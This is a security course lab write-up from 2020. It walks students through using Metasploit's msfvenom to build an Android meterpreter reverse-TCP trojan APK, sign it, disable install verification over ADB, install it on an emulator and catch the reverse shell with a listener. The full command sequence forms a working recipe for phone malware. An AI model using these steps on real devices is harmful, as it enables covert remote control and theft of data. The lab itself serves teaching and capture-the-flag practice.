M 410: Exploiting an Android Phone with Metasploit (15 pts extra)

What You Need for This Project

Purpose

To use Metasploit to add Trojan code to an Android app. This is too easy :)

Installing Required Software

On Kali, execute these commands:
sudo apt update
sudo apt install apktool
Accept any default install options.

Then execute these commands:

sudo apt install openjdk-8-jdk -y
sudo apt install zipalign -y
sudo apt install android-tools-adb -y

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion or Nox Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Creating a Malicious App

On Kali, execute this command to see the Android payloads available in Metasploit.
msfvenom -l payloads | grep android
There are only a few payloads available, as shown below.

On Kali, execute this command to find your IP address.

ifconfig
When I did it, the address was 172.16.123.180, as shown below.

On Kali, execute this command to generate the malware, replacing the IP address with your Kali systems IP address:

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.123.233 -f raw -o happyfunball.apk
The malware is generated, as shown below.

Making a Code Signing Certificate

Android won't run unsigned apps, so we need a signing certificate.

Execute this command:

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter password twice.

Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.

Signing the Malicious APK

Execute this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore happyfunball.apk alias_name
When you are prompted to, enter the key store password of password

The app is signed, as shown below.

Installing the Malware

On Kali, execute these commands:
adb shell settings put global verifier_verify_adb_installs 0
adb install happyfunball.apk
The malware installs, as shown below.

Starting a C&C Server

On Kali, in a Terminal, execute these commands, to start a listener:
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp 
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444, as shown below.


Launching the Malicious App on the Phone

On Kali, in a new Terminal window, execute these commands. In the first command, replace the IP address with the IP address of your Android device.
adb connect 172.16.123.253

adb shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1
In your other Terminal window, a meterpreter shell opens, as shown below.

Flag M 410.1: Meterpreter Version (15 pts)

In the meterpreter shell, execute this command:
sysinfo
The flag is the Meterpreter version, covered by a green rectangle in the image below.

Looting the Phone

Try these Meterpreter commands:
Posted 3-11-2020 by Sam Bowne